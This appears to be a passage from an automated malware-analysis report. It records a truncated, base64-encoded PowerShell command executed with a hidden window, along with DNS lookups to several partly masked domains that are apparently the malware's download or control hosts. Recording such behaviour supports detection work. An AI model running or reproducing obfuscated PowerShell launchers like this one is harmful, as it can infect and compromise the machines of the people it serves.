Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG4AegB1AGMAeQB0AHcAdwBuAGkAZQA9ACcATgBnAGIAcwB1AG8AZQBuAHUAeQBmAHYAdwAnADsAJABWAHgAYwB3AGUAaQBuAG...
- DNS ASK on#####cordradio.com
- DNS ASK be####in-shoes.com
- DNS ASK sm#######snisinformatika.com
- DNS ASK ji###kico.com
- DNS ASK li###enpdf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABNAG4AegB1AGMAeQB0AHcAdwBuAGkAZQA9ACcATgBnAGIAcwB1AG8AZQBuAHUAeQBmAHYAdwAnADsAJABWAHgAYwB3AGUAaQBuAG...' (with hidden window)